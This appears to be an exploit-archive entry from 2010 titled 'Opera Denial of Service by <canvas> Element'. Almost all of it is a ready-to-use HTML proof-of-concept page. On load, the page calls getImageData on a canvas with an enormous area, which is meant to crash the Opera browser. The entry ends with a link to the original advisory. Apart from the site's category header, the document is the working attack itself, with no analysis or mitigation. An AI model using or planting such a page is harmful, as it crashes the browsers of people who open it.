[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Opera Denial of Service by <canvas> Element
# Published : 2010-07-12
# Author : Pouya Daneshmand
# Previous Title : MP3 Cutter v1.5 DoS Exploit
# Next Title : Corel Presentations X5 15.0.0.357 (shw) Buffer Preoccupation PoC
Opera.html
<html>
<body onload="Opera()">
<script language=JavaScript>
function Opera() {
canvas = document.getElementById("canvas");
ctx = canvas.getContext("2d");
ctx.getImageData(0,0,0x20000,0x20000);
}
</script>
<canvas id=canvas width=10 height=10></canvas>
</body>
</html>
Original Advisory:
http://pouya.info/blog/userfiles/vul/OperaCC.pdf